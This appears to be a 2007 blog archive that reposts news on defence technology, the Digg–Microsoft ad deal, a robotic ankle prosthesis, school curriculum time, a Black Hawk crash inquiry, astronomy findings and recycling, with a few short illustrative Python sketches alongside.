Tuesday, July 31, 2007

DefenceTECH: Spotting the Magnetic Eye & Attack of the Battery Man!


Across the full range of security and defence, many initiatives are under way to push technology forward in the defence sector; here are two of the more striking ones...



Spotting the Magnetic Eye



Tracking eye movements can let a computer know when someone is paying attention and identify exactly what they are interested in, but it's also a tricky business. Most systems work by using a camera and image recognition software to identify a person's pupils and work out the direction of their gaze.



In real-life situations, however, tracking systems can be easily confused by rapid head movement or spectacles.



Now, the Office of Naval Research is looking for better ways of tracking eyes in the hope of developing military applications, such as tracking a fighter pilot's gaze.



So it has funded James DiCarlo, a neuroscientist at the Massachusetts Institute of Technology in Cambridge, US, to develop a magnetic contact lens.



A soldier would wear the lenses and a magnetic sensor attached to the side of his or her head. The sensor picks up any changes in the local magnetic field and works out how the wearer's eyes are moving.



The system should work regardless of head orientation and movement, lighting conditions, or "face furniture" such as goggles or glasses. The team says the magnetic lenses could also let disabled people control equipment such as wheelchairs.
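For a sense of how such a sensor's output might be turned into a gaze estimate, here is a minimal sketch in Python. It assumes a simple linear calibration between three-axis magnetic-field readings and gaze angles, with made-up numbers throughout; it illustrates the idea only and is not DiCarlo's actual method.

# Illustrative sketch only: map 3-axis magnetometer readings to gaze angles
# via a linear least-squares calibration. Data, model and accuracy are hypothetical.
import numpy as np

def fit_gaze_model(field_samples, gaze_angles):
    """field_samples: (N, 3) magnetic-field readings (e.g. in microtesla).
    gaze_angles: (N, 2) known [azimuth, elevation] in degrees from a calibration run."""
    X = np.hstack([field_samples, np.ones((len(field_samples), 1))])  # add a bias term
    coeffs, *_ = np.linalg.lstsq(X, gaze_angles, rcond=None)          # (4, 2) mapping
    return coeffs

def predict_gaze(coeffs, field_reading):
    x = np.append(field_reading, 1.0)
    return x @ coeffs  # estimated [azimuth, elevation] in degrees

# Toy calibration: the wearer fixates five known targets while the sensor records the field.
calib_field = np.array([[30.1, -2.0, 45.2], [31.4, 0.5, 44.8], [29.0, -4.1, 45.9],
                        [30.8, 1.9, 44.1], [29.7, -0.3, 45.5]])
calib_gaze = np.array([[0, 0], [10, 0], [-10, 0], [0, 10], [0, -10]])
model = fit_gaze_model(calib_field, calib_gaze)
print(predict_gaze(model, [30.5, 0.2, 44.9]))  # estimated gaze for a new reading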



Attack of the Battery Man
Just thought I'd forward a new Pentagon announcement intended to prompt a competitive solution to the problem of lightweight power generation for the increasing number of electronic devices carried by grunts and Joes in combat...



The Director of Defense Research and Engineering, John Young, today announced a public prize competition to develop a wearable electric power system for war fighters. The competition will take place in the fall of 2008, and the prizes are $1 million for first place, $500,000 for second place and $250,000 for third place.



The essential electronic equipment that dismounted warfighters carry today - radios, night vision devices, global positioning system receivers - runs on batteries. This competition will gather and test good ideas for reducing the weight of the batteries that service members carry. The prize objective is a wearable prototype system that can power a standard warfighter's equipment for 96 hours but weighs less than half as much as the batteries currently carried. All components, including the power generator, electrical storage, control electronics, connectors and fuel, must weigh four kilograms or less, including any attachments.



Prizes will be awarded to the top three teams in a final competitive demonstration planned for the fall of 2008. At this "wear-off," individuals or teams will demonstrate their prototype systems under realistic conditions. The top three competitors that demonstrate a complete, wearable system that produces 20 watts average power for 96 hours but weighs less than 4 kilograms (~8.8 lbs) will win the prizes.
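A quick back-of-the-envelope check, mine rather than the Pentagon's, shows how demanding that target is:

# Rough sanity check of the prize target (illustrative figures only).
avg_power_w = 20          # required average output
duration_h = 96           # required runtime
mass_limit_kg = 4.0       # total wearable system mass

energy_wh = avg_power_w * duration_h            # 1920 Wh of delivered energy
specific_energy = energy_wh / mass_limit_kg     # 480 Wh per kg of system mass

print(f"Energy required: {energy_wh} Wh")
print(f"Specific energy needed: {specific_energy} Wh/kg")
# Typical 2007-era rechargeable lithium-ion packs delivered very roughly
# 150-200 Wh/kg, which is why fuel-burning generators, fuel cells and hybrid
# schemes were expected to be the serious contenders.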



A public information forum will be held in September in the Washington, D.C., area to brief potential competitors on the technical details, the competition rules and the qualification requirements. Competitors must register to participate in the prize program by Nov. 30, 2007. The competition is open to international participation; however, the individual or team leader must provide proof of U.S. citizenship. Details on the forum, as well as contest registration and rules, are posted on the Defense Research and Engineering Prize Web site.







Wednesday, July 25, 2007

Bye-bye Google, welcome Microsoft - Digg


Kevin Rose at Digg is saying the popular user-driven news site has just signed a three-year exclusive ad deal with Microsoft. Bye-bye Google. Don't think it will hurt Google's bottom line much, and Mike Arrington at TechCrunch thinks it's another money-losing deal for the software giant, which also did a similar deal with Facebook. But neither is this a ringing endorsement of Google from one of the stars of Web 2.0, with 17 million unique monthly users. "No dancing monkey ads, and the design will remain uncluttered," Rose vows, no doubt anticipating the usual Microsoft-bashing in Digg comments on the post.



Although John Battelle's Federated Media is still involved and apparently will work with Microsoft on Digg sponsorships, some folks are wondering if Federated's role is rather less than it was intended to be. Will update as I hear more.



For now, though, "it's a real coup for Microsoft," Internet marketing consultant Andy Beal told my colleague Tom Giles. "It's a good way to put their product in front of a high-tech savvy audience." On the other hand, it remains to be seen how lucrative an ad magnet Digg will be. Ashkan Karbasfrooshan at watchmojo.com thinks not so much.



As for the odd man out, Yahoo!, Beal says it's in a tough position: "They want to get the partnerships away from Google, but can't afford to cut deals. They need the revenue coming in. With investors watching closely, I don't think Yahoo can afford to be ultra-aggressive."



Clearly, the battle for the ad business of the new crop of Web companies is intensifying. In particular, it will be interesting to see how Google and Microsoft will spend their seemingly boundless budgets--and if and when we'll see one of them blink. Not for a good long while, I think.






Robotic ankle research gets off on the right foot


An Army veteran who lost part of his leg in Iraq walked with more spring in his step Monday as he unveiled the world's first robotic ankle -- an important advance for lower-limb amputees that was developed by a team at MIT.



Garth Stewart, 24, who lost his left leg below the knee in an explosion in Iraq, demonstrated the new powered ankle-foot prosthesis during a ceremony at the Providence, R.I., Veterans Affairs Medical Center. Stewart walked in the device, which, unlike any other, propels users forward using tendon-like springs and an electric motor. The prototype device reduces fatigue, improves balance and provides amputees with a more fluid gait. It could become commercially available as early as the summer of 2008.



MIT Media Lab Professor Hugh Herr and his team of researchers developed the ankle-foot. Herr, NEC Career Development Professor and head of the biomechatronics research group at the Media Lab, is a VA research investigator. He is also a double amputee who tested his invention: "This design releases three times the power of a conventional prosthesis to propel you forward and, for the first time, provides amputees with a truly humanlike gait," Herr said.



"It's wild," he said, "like you're on one of those moving walkways in the airport."



Because conventional prostheses only provide a passive spring response during walking, they force the amputee to have an unnatural gait and typically to expend some 30 percent more energy on walking than a non-amputee. The new ankle is light, flexible, and -- most importantly -- generates energy for walking beyond that which can be released from a spring alone.



This is accomplished through a device equipped with multiple springs and a small battery-powered motor. The energy produced from the forward motion of the person wearing the prosthesis is stored in the power-assisted spring and then released as the foot pushes off. The motor supplies additional mechanical energy on top of what the spring returns, helping to sustain momentum.
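To make the spring-plus-motor idea concrete, here is a deliberately toy model with invented numbers. It is not MIT's design; it only illustrates why adding motor energy at push-off multiplies the work delivered per step.

# Toy comparison (hypothetical numbers): push-off work from a passive spring
# prosthesis versus one that adds battery-powered motor energy.
def pushoff_work(spring_energy_j, motor_energy_j=0.0, spring_efficiency=0.9):
    """Energy delivered at push-off: recovered spring energy plus any motor input."""
    return spring_energy_j * spring_efficiency + motor_energy_j

passive = pushoff_work(spring_energy_j=10)                      # spring-only device
powered = pushoff_work(spring_energy_j=10, motor_energy_j=18)   # spring plus motor assist

print(f"Passive prosthesis push-off: {passive:.1f} J per step")
print(f"Powered prosthesis push-off: {powered:.1f} J per step")
print(f"Ratio: {powered / passive:.1f}x")  # about 3x here, purely by construction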



Herr created the device through the Center for Restorative and Regenerative Medicine (CRRM), a collaborative research initiative that includes the Providence VA Medical Center, Brown University and MIT. The center's mission is to improve the lives of individuals with limb trauma through tissue restoration, advanced rehabilitation and new prosthetics that give amputees - particularly war veterans - better mobility and control of their limbs and reduce the discomfort and infections common with current prostheses.



To achieve this goal, the center funds a team of researchers with expertise in tissue engineering, orthopedics, neurotechnology, prosthetic design and rehabilitation. The aim is to bring these complementary techniques together to create "biohybrid" limbs composed of biological and man-made materials - a melding of man and machine.



To meet this goal, the VA has provided an additional $6.9 million to construct a state-of-the-art rehabilitation research building that will house the center on the campus of the Providence VA Medical Center. Construction begins this fall.



"A major goal of the center is to develop artificial limbs that perform like biological ones," said Professor Roy Aaron, M.D., of Brown University, director of the CRRM. "Hugh Herr and his team have met that goal - and done so successfully. This device is a major step forward for Garth Stewart and other amputees."



Joel Kupersmith, M.D., chief research and development officer for VA, said a top priority for the department is providing state-of-the-art prosthetic care for veterans - especially those returning from Iraq and Afghanistan. VA research, he said, is integral to this effort.



"The robotic ankle is a sterling example of how our leading-edge research improves veterans' lives," Kupersmith said. "Up to now, prosthetic devices have not been able to duplicate the complex functions of our feet and ankles as we walk and run. The ingenious computerized design of this new prosthesis changes all of this, as it constantly 'thinks' and responds, allowing the person to walk or run in a more natural and comfortable way."



Michael E. Selzer, M.D., director of Rehabilitation Research and Development for VA, agreed: "Hugh Herr and his Media Lab group are well-known for their scientific ingenuity and creativity on behalf of amputees. This new technology represents rehabilitation research at its finest, and is yet another milestone in VA's long history of outstanding achievements in this area."

Adding time to the school day in order to focus on reading and math


Almost half the nation’s school districts have significantly decreased the daily class time spent on subjects like science, art and history as a result of the federal No Child Left Behind law’s focus on annual tests in reading and math, according to a new report released yesterday.
The report, by the Center on Education Policy, a Washington group that studies the law’s implementation in school districts nationwide, said that about 44 percent of districts have cut time from one or more subjects or activities in elementary schools to extend time for longer daily math and reading lessons. Among the subjects or activities getting less attention since the law took effect in 2002 are science, social studies, art and music, gym, lunch and recess, the report said.
The report, based on a survey of nearly 350 of the nation’s 15,000 districts, said 62 percent of school districts had increased daily class time in reading and math since the law took effect.
Within a year of the law’s implementation, teachers and their associations were reporting that schools and districts were suggesting or requiring that they spend more time on reading and math to improve test scores, and that they cut back time spent on other disciplines.
The narrowing of the nation’s elementary school curriculum has been significant, according to the report, but may not be affecting as many schools as previously thought.
A report that the center issued in March 2006, based on a similar survey, gave one of the first measures of the extent of the narrowing trend. It said 71 percent of districts had reduced elementary school instruction in at least one other subject to make more time for reading and mathematics. That finding attracted considerable attention, with many groups opposed to the law decrying the trend.
The law’s backers, including Secretary of Education Margaret Spellings, argued that the intensification of English and math instruction made good sense on its own because, they said, students who could not read or calculate with fluency would flounder in other subjects, too.
The center’s new report raises the question of how to explain the considerable discrepancy between last year’s finding, that 71 percent of districts had reduced instructional time in subjects other than math and reading, and this year’s, which gives the number as 44 percent.
Jack Jennings, the center’s president, said in an interview that the discrepancy was a result of a change in the wording of the questionnaire. Last year’s survey asked districts to say whether they had reduced instructional time in subjects other than reading and math “to a great extent,” “somewhat,” “minimally” or “not at all.” Districts that reported even minimally reduced instructional time on other subjects were included in the 71 percent, along with districts that carried out more substantial changes, Mr. Jennings said.
This year, the center listed English/language arts and math as well as social studies, art and music, science and other subjects on the survey, and asked districts whether class time in each had increased, stayed the same or decreased since the law’s enactment. In a second column, the survey asked districts to indicate the number of minutes by which instructional time had increased or decreased.
Districts that made only small reductions this year, 10 minutes a day or less, in the time devoted to courses other than reading or math, may have chosen to report that instructional time had remained the same, Mr. Jennings said. On last year’s survey, the same districts may instead have acknowledged reducing the time, while characterizing the reduction as minimal, he said.
According to the new survey, the average change in instructional time in elementary schools since the law’s enactment has been 140 additional minutes per week for reading, 87 additional minutes per week for math, 76 fewer minutes per week for social studies, 75 fewer minutes for science, 57 fewer minutes for art and 40 fewer minutes for gym.
In a statement, Secretary Spellings said the report’s scope was “too limited to draw broad conclusions.”
“In fact,” she said, “there is much evidence that shows schools are adding time to the school day in order to focus on reading and math, not cutting time from other subjects.”

Tuesday, July 24, 2007

Experts have recreated the final, fateful moments leading up to last year's Black Hawk helicopter crash off Fiji.



Defence department experts have recreated the final, fateful moments leading up to last year's Black Hawk helicopter crash off Fiji.
It emerged at the Sydney military board of inquiry into the crash that, given the conditions of the helicopter's approach to land on HMAS Kanimbla, there was insufficient power to slow its descent and lessen its impact with the warship.
Through a combination of 3D computer modelling, helicopter simulator trials and the analysis of the Black Hawk's flight data recorder (FDR), experts also were able to rule out engine failure as a cause of the crash.
The expert witnesses from the Defence Science and Technology Organisation (DSTO) gave evidence as part of the inquiry into how the helicopter failed to negotiate a landing on the deck of the Kanimbla and plunged into the sea last November.
The pilot, Captain Mark Bingley, and SAS Trooper Joshua Porter were killed when the aircraft crashed during practice for evacuations from coup-stricken Fiji.
Helicopter simulation expert Sylvain Manso talked the board through footage of two of the army's top pilots undertaking simulator runs recreating the ill-fated manoeuvre attempted by Capt Bingley.
Those that most closely followed Capt Bingley's route found it had resulted in an "unrecoverable descent rate", Mr Manso told the board.
"There was insufficient available power to recover from the flight conditions from the defined ingress," Mr Manso said.
Video footage from a security camera aboard the Kanimbla allowed experts in photogrammetry, which is the science of measuring object position using images, to plot much of the Black Hawk's approach.
Another DSTO expert, Thuan Truong, brought to life an analysis of data from the FDR, retrieved from the helicopter wreckage.
Through a series of graphs depicting flight data recorded as frequently as eight times per second, Mr Truong was able to show how Capt Bingley desperately pulled hard on the control stick in a bid to raise the nose in the last two seconds before the crash.
The graphs also revealed how Capt Bingley frantically pumped the helicopter's right pedal as he tried to correct its course.
The FDR data also gave further weight to the role of "rotor droop", where the main rotor loses power, in causing the crash.
Although no data was recorded for the main rotor, Mr Truong said data showing how power to the tail rotor plummeted to 75 per cent could be applied with reasonable accuracy to the main rotor.
"There was a tremendous reduction of aircraft lift, at 75 per cent rpm (rotor speed) the aircraft lift is approximately half its weight," Mr Truong said.
Helicopter structure engineer Dominigo Lombardo said he had inspected the salvaged wreckage of the Black Hawk and found no evidence of engine failure.
"There was nothing that stood out as being unusual," he said.
The evidence from the FDR and simulator runs also ruled out engine failure.
The inquiry continues on Tuesday.

Planets with Four Parents? Spitzer Shows It's Possible


Image credit: NASA/JPL-Caltech/UCLA

How many stars does it take to "raise" a planet? In our own solar system, it took only one -- our sun. However, new research from NASA's Spitzer Space Telescope shows that planets might be forming in systems with as many as four stars. This artist's concept illustrates one such quadruple-star system, called HD 98800. The system is still relatively young, at 10 million years old. One of its two pairs of stars is known to be circled by a dusty disk, which contains materials that are thought to clump together to form planets.


When Spitzer set its infrared gaze on the disk, it detected gaps. How did the gaps get there? One possible answer is that planets are growing in size and carving out lanes in the dust. Spitzer found two gaps in the disk. The inner gap is about as far away from its central stars as Mars and the asteroid belt are from our sun.

The outer gap is about as far away from its central stars as Jupiter is from the sun. HD 98800 is located 150 light-years away in the constellation TW Hydrae.


Before Spitzer set its gaze on HD 98800, astronomers had a rough idea of the system's structure from observations with ground-based telescopes. They knew the system contains four stars, and that the stars are paired off into doublets, or binaries. The stars in the binary pairs orbit around each other, and the two pairs also circle each other like choreographed ballerinas. One of the stellar pairs, called HD 98800B, has a disk of dust around it, while the other pair has none.


Although the four stars are gravitationally bound, the distance separating the two binary pairs is about 50 astronomical units (AU) -- slightly more than the average distance between our sun and Pluto. Until now, technological limitations have hindered astronomers' efforts to look at the dusty disk around HD 98800B more closely.


With Spitzer, scientists finally have a detailed view. Using the telescope's infrared spectrometer, Furlan's team sensed the presence of two belts in the disk made of large dust grains. One belt sits at approximately 5.9 AU away from the central binary, HD 98800B, or about the distance from the sun to Jupiter. This belt is likely made up of asteroids or comets. The other belt sits at 1.5 to 2 AU, comparable to the area where Mars and the asteroid belt sit, and probably consists of fine grains.


"Typically, when astronomers see gaps like this in a debris disk, they suspect that a planet has cleared the path. However, given the presence of the diskless pair of stars sitting 50 AU away, the inward-migrating dust particles are likely subject to complex, time-varying forces, so at this point the existence of a planet is just speculation," said Furlan.


Astronomers believe that planets form like snowballs over millions of years, as small dust grains clump together to form larger bodies. Some of these cosmic rocks then smash together to form rocky planets, like Earth, or the cores of gas-giant planets like Jupiter. Large rocks that don't form planets often become asteroids and comets. As these rocky structures violently collide, bits of dust are released into space. Scientists can see these dust grains with Spitzer's supersensitive infrared eyes.


According to Furlan, the dust generated from the collision of rocky objects in the outer belt should eventually migrate toward the inner disk. However, in the case of HD 98800B, the dust particles do not evenly fill out the inner disk as expected, due to either planets or the diskless binary pair sitting 50 AU away and gravitationally influencing the movement of dust particles.


"Since many young stars form in multiple systems, we have to realize that the evolution of disks around them and the possible formation of planetary systems can be way more complicated and perturbed than in a simple case like our solar system," Furlan added



More Negativity Found in Space




Two teams of astronomers have identified the signal of a new negatively charged molecule, or anion, in space — only the third found in the cosmos. About 130 neutral and 12 positively charged molecules have been detected in space.
Along with its two siblings, the newfound anion, called octatetraynyl, could be among the building blocks of the organic molecules that make up living things. Even more interestingly, the two teams found the anion in entirely different cosmic locales.
Octatetraynyl is an odd little string of eight carbon atoms and a single hydrogen atom, written as C8H-. Its negative charge comes from the molecule having one electron more than is needed to balance the positive protons in all the atoms' nuclei.




It's not the sort of molecule that would last long on Earth, where there are all sorts of reactive molecules ready to make it neutral.
"Some of the things we're detecting in space you'd never find on Earth," said Anthony Remijan of the National Radio Astronomy Observatory (NRAO).
That's what makes them hard to find in space, he explained: Not having them here, we are hard put to know what they will look like. That has made the hunt a long and multi-disciplinary process.
The search began in the 1990s, when radio astronomers surveying the sky noticed some unusual lines showing up in spectra of radio signals, Remijan explained.
Such lines are usually the calling cards of specific compounds, which absorb or emit very narrow radio bands. But in this case, no one knew of any compounds that produced such lines.
Other researchers, including Eric Herbst of Ohio State University, had already done some calculations and made models about what sorts of compounds might produce certain radio lines. But it took actual laboratory tests on manmade versions of the molecules to verify what kind of radio lines anions would make.
For octatetraynyl, that lab work was completed only last year.




Finally, radio astronomers went looking specifically for octatetraynyl's laboratory-tested lines. A Harvard team looked at a cold, dark gas cloud and a team from NRAO looked in the tenuous outer envelope of a dying star.
Both teams used the National Science Foundation's giant Green Bank Telescope (GBT) in West Virginia, which sees the universe in radio waves. Both found octatetraynyl.
"It's not so different physically," said Herbst of the two space environments. They have similar temperatures and densities, he said, though the way the anion was created could be different.




Which raises a big question: How do the molecules get their extra electron?
"One mechanism is a two-body process," said Herbst. In other words, a free-flying electron simply slams into a molecule and sticks.
As for whether more anions will be discovered in space, "There are many other candidates," Herbst told Discovery News. "But they have to be measured in the laboratory first." Then radio astronomers will know what to look for.




Construction has been completed on the world's largest fully steerable radio telescope at the National Radio Astronomy Observatory's site in Green Bank, Pocahontas County, West Virginia (79° 50' 23.40" W, 38° 25' 59.23" N : NAD83).
The GBT is described as a 100-meter telescope, but the actual dimensions of the surface are 100 by 110 meters. The overall structure of the GBT is a wheel-and-track design that allows the telescope to view the entire sky above 5 degrees elevation. The track, 64 m (210 ft) in diameter, is level to within a few thousandths of an inch in order to provide precise pointing of the structure while bearing 7300 metric tons (16,000,000 pounds) of moving weight.
The GBT is of an unusual design. Unlike conventional telescopes, which have a series of supports in the middle of the surface, the GBT's aperture is unblocked so that incoming radiation meets the surface directly. This increases the useful area of the telescope and eliminates reflection and diffraction that ordinarily complicate a telescope's pattern of response. To accommodate this, an off-axis feed arm cradles the dish, projecting upward at one edge, and the telescope surface is asymmetrical. It is actually a 100-by-110 meter section of a conventional, rotationally symmetric 208-meter figure, beginning four meters outward from the vertex of the hypothetical parent structure.
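To visualise the off-axis arrangement, here is a small sketch that treats the 208-metre parent figure as a paraboloid z = r^2/(4f). The 60-metre focal length is an assumed value for illustration, not a figure taken from this description.

# Sketch of the off-axis geometry described above (assumed 60 m focal length).
import numpy as np

focal_length_m = 60.0           # assumed focal length of the 208 m parent figure
inner_edge_m = 4.0              # the GBT surface starts 4 m from the parent's vertex
outer_edge_m = 4.0 + 110.0      # and extends 110 m outward from there

r = np.linspace(inner_edge_m, outer_edge_m, 5)
z = r**2 / (4 * focal_length_m)   # height of the surface above the vertex plane

for radius, height in zip(r, z):
    print(f"r = {radius:6.1f} m  ->  surface height z = {height:6.2f} m")
# Because the panels sit entirely to one side of the axis of symmetry, the feed
# arm can be cantilevered off the edge and the aperture is left unblocked.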
The GBT's lack of circular symmetry greatly increases the complexity of its design and construction. The GBT is also unusual in that the 2,004 panels that make up its surface are mounted at their corners on actuators, little motor-driven pistons, which make it easier to adjust the surface shape. Such adjustment is crucial to the high-frequency performance of the GBT in which an accurate surface figure must be maintained.
The GBT is equipped with a novel laser-ranging system. Beams of light are reflected within the structure and between the telescope and a series of ground stations surrounding the telescope in a broad ring. Monitoring of these beams show the deformation of the figure under such stresses as gravity, wind and temperature differences, and allow the telescope's motors, subreflector and surface panel actuators to compensate for any ill effects.

Monday, July 23, 2007

As the importance of recycling becomes more apparent, questions about it linger. Is it worth the effort? How does it work? Is recycling waste just going into a landfill in China?


IT IS an awful lot of rubbish. Since 1960 the amount of municipal waste being collected in America has nearly tripled, reaching 245m tonnes in 2005. According to European Union statistics, the amount of municipal waste produced in western Europe increased by 23% between 1995 and 2003, to reach 577kg per person. (So much for the plan to reduce waste per person to 300kg by 2000.) As the volume of waste has increased, so have recycling efforts. In 1980 America recycled only 9.6% of its municipal rubbish; today the rate stands at 32%. A similar trend can be seen in Europe, where some countries, such as Austria and the Netherlands, now recycle 60% or more of their municipal waste. Britain's recycling rate, at 27%, is low, but it is improving fast, having nearly doubled in the past three years.
Even so, when a city introduces a kerbside recycling programme, the sight of all those recycling lorries trundling around can raise doubts about whether the collection and transportation of waste materials requires more energy than it saves. “We are constantly being asked: Is recycling worth doing on environmental grounds?” says Julian Parfitt, principal analyst at Waste & Resources Action Programme (WRAP), a non-profit British company that encourages recycling and develops markets for recycled materials.
Studies that look at the entire life cycle of a particular material can shed light on this question in a particular case, but WRAP decided to take a broader look. It asked the Technical University of Denmark and the Danish Topic Centre on Waste to conduct a review of 55 life-cycle analyses, all of which were selected because of their rigorous methodology. The researchers then looked at more than 200 scenarios, comparing the impact of recycling with that of burying or burning particular types of waste material. They found that in 83% of all scenarios that included recycling, it was indeed better for the environment.
Based on this study, WRAP calculated that Britain's recycling efforts reduce its carbon-dioxide emissions by 10m-15m tonnes per year. That is equivalent to a 10% reduction in Britain's annual carbon-dioxide emissions from transport, or roughly equivalent to taking 3.5m cars off the roads. Similarly, America's Environmental Protection Agency estimates that recycling reduced the country's carbon emissions by 49m tonnes in 2005.
Recycling has many other benefits, too. It conserves natural resources. It also reduces the amount of waste that is buried or burnt, hardly ideal ways to get rid of the stuff. (Landfills take up valuable space and emit methane, a potent greenhouse gas; and although incinerators are not as polluting as they once were, they still produce noxious emissions, so people dislike having them around.) But perhaps the most valuable benefit of recycling is the saving in energy and the reduction in greenhouse gases and pollution that result when scrap materials are substituted for virgin feedstock. “If you can use recycled materials, you don't have to mine ores, cut trees and drill for oil as much,” says Jeffrey Morris of Sound Resource Management, a consulting firm based in Olympia, Washington.
Extracting metals from ore, in particular, is extremely energy-intensive. Recycling aluminium, for example, can reduce energy consumption by as much as 95%. Savings for other materials are lower but still substantial: about 70% for plastics, 60% for steel, 40% for paper and 30% for glass. Recycling also reduces emissions of pollutants that can cause smog, acid rain and the contamination of waterways.
A brief history of recycling
The virtue of recycling has been appreciated for centuries. For thousands of years metal items have been recycled by melting and reforming them into new weapons or tools. It is said that the broken pieces of the Colossus of Rhodes, a statue deemed one of the seven wonders of the ancient world, were recycled for scrap. During the industrial revolution, recyclers began to form businesses and later trade associations, dealing in the collection, trade and processing of metals and paper. America's Institute of Scrap Recycling Industries (ISRI), a trade association with more than 1,400 member companies, traces its roots back to one such organisation founded in 1913. In the 1930s many people survived the Great Depression by peddling scraps of metal, rags and other items. In those days reuse and recycling were often economic necessities. Recycling also played an important role during the second world war, when scrap metal was turned into weapons.
As industrial societies began to produce ever-growing quantities of garbage, recycling took on a new meaning. Rather than recycling materials for purely economic reasons, communities began to think about how to reduce the waste flow to landfills and incinerators. Around 1970 the environmental movement sparked the creation of America's first kerbside collection schemes, though it was another 20 years before such programmes really took off.
In 1991 Germany made history when it passed an ordinance shifting responsibility for the entire life cycle of packaging to producers. In response, the industry created Duales System Deutschland (DSD), a company that organises a separate waste-management system that exists alongside public rubbish-collection. By charging a licensing fee for its “green dot” trademark, DSD pays for the collection, sorting and recycling of packaging materials. Although the system turned out to be expensive, it has been highly influential. Many European countries later adopted their own recycling initiatives incorporating some degree of producer responsibility.
In 1987 a rubbish-laden barge cruised up and down America's East Coast looking for a place to unload, sparking a public discussion about waste management and serving as a catalyst for the country's growing recycling movement. By the early 1990s so many American cities had established recycling programmes that the resulting glut of materials caused the market price for kerbside recyclables to fall from around $50 per ton to about $30, says Dr Morris, who has been tracking prices for recyclables in the Pacific Northwest since the mid-1980s. As with all commodities, costs for recyclables fluctuate. But the average price for kerbside materials has since slowly increased to about $90 per ton.
Even so, most kerbside recycling programmes are not financially self-sustaining. The cost of collecting, transporting and sorting materials generally exceeds the revenues generated by selling the recyclables, and is also greater than the disposal costs. Exceptions do exist, says Dr Morris, largely near ports in dense urban areas that charge high fees for landfill disposal and enjoy good market conditions for the sale of recyclables.
Sorting things out
Originally kerbside programmes asked people to put paper, glass and cans into separate bins. But now the trend is toward co-mingled or “single stream” collection. About 700 of America's 10,000 kerbside programmes now use this approach, says Kate Krebs, executive director of America's National Recycling Coalition. But the switch can make people suspicious: if there is no longer any need to separate different materials, people may conclude that the waste is simply being buried or burned. In fact, the switch towards single-stream collection is being driven by new technologies that can identify and sort the various materials with little or no human intervention. Single-stream collection makes it more convenient for householders to recycle, and means that more materials are diverted from the waste stream.
San Francisco, which changed from multi to single-stream collection a few years ago, now boasts a recycling rate of 69%—one of the highest in America. With the exception of garden and food waste, all the city's kerbside recyclables are sorted in a 200,000-square-foot facility that combines machines with the manpower of 155 employees. The $38m plant, next to the San Francisco Bay, opened in 2003. Operated by Norcal Waste Systems, it processes an average of 750 tons of paper, plastic, glass and metals a day.
The process begins when a truck arrives and dumps its load of recyclables at one end of the building. The materials are then piled on to large conveyer belts that transport them to a manual sorting station. There, workers sift through everything, taking out plastic bags, large pieces of cardboard and other items that could damage or obstruct the sorting machines. Plastic bags are especially troublesome as they tend to get caught in the spinning-disk screens that send weightier materials, such as bottles and cans, down in one direction and the paper up in another.
Corrugated cardboard is separated from mixed paper, both of which are then baled and sold. Plastic bottles and cartons are plucked out by hand. The most common types, PET (type 1) and HDPE (type 2), are collected separately; the rest go into a mixed-plastics bin.
Next, a magnet pulls out any ferrous metals, typically tin-plated or steel cans, while the non-ferrous metals, mostly aluminium cans, are ejected by eddy current. Eddy-current separators, in use since the early 1990s, consist of a rapidly revolving magnetic rotor inside a long, cylindrical drum that rotates at a slower speed. As the aluminium cans are carried over this drum by a conveyer belt, the magnetic field from the rotor induces circulating electric currents, called eddy currents, within them. This creates a secondary magnetic field around the cans that is repelled by the magnetic field of the rotor, literally ejecting the aluminium cans from the other waste materials.
Finally, the glass is separated by hand into clear, brown, amber and green glass. For each load, the entire sorting process from start to finish takes about an hour, says Bob Besso, Norcal's recycling-programme manager for San Francisco.
Although all recycling facilities still employ people, investment is increasing in optical sorting technologies that can separate different types of paper and plastic. Development of the first near-infra-red-based waste-sorting systems began in the early 1990s. At the time Elopak, a Norwegian producer of drink cartons made of plastic-laminated cardboard, worried that it would have to pay a considerable fee to meet its producer responsibilities in Germany and other European countries. To reduce the overall life-cycle costs associated with its products, Elopak set out to find a way to automate the sorting of its cartons. The company teamed up with SINTEF, a Norwegian research centre, and in 1996 sold its first unit in Germany. The technology was later spun off into a company now called TiTech.
TiTech's systems—more than 1,000 of which are now installed worldwide—rely on spectroscopy to identify different materials. Paper and plastic items are spread out on a conveyor belt in a single layer. When illuminated by a halogen lamp, each type of material reflects a unique combination of wavelengths in the infra-red spectrum that can be identified, much like a fingerprint. By analysing data from a sensor that detects light in both the visible and the near-infra-red spectrum, a computer is able to determine the colour, type, shape and position of each item. Air jets are then activated to push particular items from one conveyor belt to another, or into a bin. Numerous types of paper, plastic or combinations thereof can thus be sorted with up to 98% accuracy.
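To make the identify-and-eject idea concrete, here is a toy sketch: it matches a measured reflectance "fingerprint" against a few reference spectra and decides which air jet to fire. The spectra, threshold and bin names are invented; TiTech's real algorithms are proprietary and far more sophisticated.

# Illustrative only: classify an item from a coarse near-infra-red reflectance
# "fingerprint" and route it. Reference spectra and threshold are invented.
import numpy as np

REFERENCE_SPECTRA = {           # reflectance sampled at a few NIR wavelengths
    "PET":   np.array([0.62, 0.35, 0.48, 0.20]),
    "HDPE":  np.array([0.70, 0.55, 0.30, 0.42]),
    "paper": np.array([0.80, 0.78, 0.75, 0.70]),
}

def classify(measured, max_distance=0.15):
    """Return the best-matching material, or None if nothing matches well."""
    best, best_dist = None, float("inf")
    for material, ref in REFERENCE_SPECTRA.items():
        dist = np.linalg.norm(measured - ref) / np.sqrt(len(ref))
        if dist < best_dist:
            best, best_dist = material, dist
    return best if best_dist <= max_distance else None

def route_item(measured):
    material = classify(np.asarray(measured, dtype=float))
    if material == "PET":
        return "fire air jet -> PET bin"
    if material == "HDPE":
        return "fire air jet -> HDPE bin"
    return "let item pass to the mixed/reject stream"

print(route_item([0.60, 0.36, 0.50, 0.22]))   # close to the PET fingerprint
print(route_item([0.10, 0.10, 0.10, 0.10]))   # matches nothing -> reject stream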
For many materials the process of turning them back into useful raw materials is straightforward: metals are shredded into pieces, paper is reduced to pulp and glass is crushed into cullet. Metals and glass can be remelted almost indefinitely without any loss in quality, while paper can be recycled up to six times. (As it goes through the process, its fibres get shorter and the quality deteriorates.)
Plastics, which are made from fossil fuels, are somewhat different. Although they have many useful properties—they are flexible, lightweight and can be shaped into any form—there are many different types, most of which need to be processed separately. In 2005 less than 6% of the plastic from America's municipal waste stream was recovered. And of that small fraction, the only two types recycled in significant quantities were PET and HDPE. For PET, food-grade bottle-to-bottle recycling exists. But plastic is often “down-cycled” into other products such as plastic lumber (used in place of wood), drain pipes and carpet fibres, which tend to end up in landfills or incinerators at the end of their useful lives.
